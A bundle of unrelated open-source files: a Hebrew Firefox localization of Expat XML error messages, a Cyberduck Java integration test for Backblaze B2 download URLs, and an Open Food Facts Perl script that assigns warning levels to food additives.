* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
| {
"pile_set_name": "Github"
} |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
# Map Expat error codes to error strings
1 = הזיכרון אזל
2 = שגיאת תחביר
3 = לא נמצא רכיב שורש
4 = אינו בנוי היטב
5 = אסימון לא סגור
6 = אסימון לא סגור
7 = תגית לא מתאימה
8 = תכונה כפולה
9 = זבל אחרי מרכיב מסמך
10 = פרמטר לא חוקי בהפניה לישות
11 = ישות לא מוגדרת
12 = הפנית ישות רקורסיבית
13 = ישות לא מתואמת (א־סינכרונית)
14 = הפניה למספר תו לא חוקי
15 = הפנייה לישות בינארית
16 = הפנייה לישות חיצונית בתכונה
17 = הוראות עיבוד XML אינן בתחילת ישות חיצונית
18 = קידוד לא מוכר
19 = הקידוד שצוין בהכרזת XML אינו נכון
20 = מיקטע CDATA לא סגור
21 = שגיאה בעיבוד הפניה לישות חיצונית
22 = מסמך אינו עומד בפני עצמו
23 = unexpected parser state
24 = entity declared in parameter entity
27 = prefix not bound to a namespace
28 = must not undeclare prefix
29 = incomplete markup in parameter entity
30 = XML declaration not well-formed
31 = text declaration not well-formed
32 = illegal character(s) in public id
38 = reserved prefix (xml) must not be undeclared or bound to another namespace URI
39 = reserved prefix (xmlns) must not be declared or undeclared
40 = prefix must not be bound to one of the reserved namespace URIs
# %1$S is replaced by the Expat error string, may be followed by Expected (see below)
# %2$S is replaced by URL
# %3$u is replaced by line number
# %4$u is replaced by column number
XMLParsingError = שגיאה בניתוח XML: %1$S\nמיקום: %2$S שורה מספר %3$u, עמודה %4$u:
# %S is replaced by a tag name.
# This gets appended to the error string if the error is mismatched tag.
Expected = . היה צפוי: </%S>.
| {
"pile_set_name": "Github"
} |
package ch.cyberduck.core.b2;
/*
* Copyright (c) 2002-2017 iterate GmbH. All rights reserved.
* https://cyberduck.io/
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
import ch.cyberduck.core.AlphanumericRandomStringService;
import ch.cyberduck.core.DescriptiveUrl;
import ch.cyberduck.core.DisabledLoginCallback;
import ch.cyberduck.core.DisabledPasswordCallback;
import ch.cyberduck.core.Path;
import ch.cyberduck.core.features.Delete;
import ch.cyberduck.core.features.PromptUrlProvider;
import ch.cyberduck.core.transfer.TransferStatus;
import ch.cyberduck.test.IntegrationTest;
import org.junit.Test;
import org.junit.experimental.categories.Category;
import java.util.Collections;
import java.util.EnumSet;
import static org.junit.Assert.*;
@Category(IntegrationTest.class)
public class B2AuthorizedUrlProviderTest extends AbstractB2Test {
@Test
public void testToUrl() throws Exception {
final Path bucket = new Path("/test-cyberduck", EnumSet.of(Path.Type.directory, Path.Type.volume));
final Path test = new Path(bucket, new AlphanumericRandomStringService().random(), EnumSet.of(Path.Type.file));
final B2FileidProvider fileid = new B2FileidProvider(session).withCache(cache);
new B2TouchFeature(session, fileid).touch(test, new TransferStatus());
final B2AuthorizedUrlProvider provider = new B2AuthorizedUrlProvider(session, fileid);
assertFalse(provider.isSupported(bucket, PromptUrlProvider.Type.download));
final DescriptiveUrl url = provider.toDownloadUrl(test, null, new DisabledPasswordCallback());
assertNotEquals(DescriptiveUrl.EMPTY, url);
assertNotNull(url.getUrl());
new B2DeleteFeature(session, fileid).delete(Collections.singletonList(test), new DisabledLoginCallback(), new Delete.DisabledCallback());
}
}
| {
"pile_set_name": "Github"
} |
#!/usr/bin/perl -w
# This file is part of Product Opener.
#
# Product Opener
# Copyright (C) 2011-2019 Association Open Food Facts
# Contact: [email protected]
# Address: 21 rue des Iles, 94100 Saint-Maur des Fossés, France
#
# Product Opener is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
use Modern::Perl '2017';
use utf8;
binmode STDIN, ':encoding(UTF-8)';
binmode STDOUT, ':encoding(UTF-8)';
my %europe = ();
my @levels = (
{
'e150'=>'',
'e470'=>'',
'e960' => 'Autorisé en Europe depuis le 2 décembre 2011',
'e441' => 'La gélatine est considérée en Europe comme un ingrédient et non un additif.',
'e428' => 'La gélatine est considérée en Europe comme un ingrédient et non un additif.',
},
{
'e120' => "Risque d'allergie.",
'e131'=>"Responsable d'allergies (urticaire) et soupçonné d'être cancérigène.<br/>
Interdit en Australie, au Canada, aux Etats-Unis et en Norvège.",
'e132'=>"Risque d'allergie. Interdit en Norvège.",
},
{
'e104'=>"Peut avoir un effet nuisible sur l’activité et l’attention des enfants.",
'e110'=>"Peut avoir un effet nuisible sur l’activité et l’attention des enfants.",
'e122'=>"Peut avoir un effet nuisible sur l’activité et l’attention des enfants.",
'e129'=>"Peut avoir un effet nuisible sur l’activité et l’attention des enfants.",
'e102'=>"Peut avoir un effet nuisible sur l’activité et l’attention des enfants.",
'e124'=>"Peut avoir un effet nuisible sur l’activité et l’attention des enfants.",
},
);
open(my $IN, "<:encoding(UTF-8)", "europe_2011.txt");
while (<$IN>) {
chomp;
if ($_ =~ /E (\w+)/) {
my $id = 'E' . $1;
$europe{lc($id)} = 1;
}
}
close ($IN);
open($IN, "<:encoding(UTF-8)", "additives_source.txt");
while (<$IN>) {
chomp;
my ($canon_name, $other_names, $misc, $desc, $level, $warning) = split("\t");
$level = -1;
(defined $desc) or ($desc = '');
(defined $warning) or ($warning = '');
for (my $i = 0; $i <= $#levels; $i++) {
if (defined $levels[$i]{lc($canon_name)}) {
$level = $i;
if ($level > 0) {
$warning = $levels[$i]{lc($canon_name)};
}
else {
$desc = $levels[$i]{lc($canon_name)};
}
}
}
if (($level < 0) and (not defined $europe{lc($canon_name)})) {
$level = 3;
$warning = "Additif non autorisé en Europe (liste N° 1129/2011 du 11 Novembre 2011)";
}
print $canon_name . "\t" . $other_names . "\t" . $misc . "\t" . $desc . "\t" . $level . "\t" . $warning . "\n";
}
close ($IN);
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.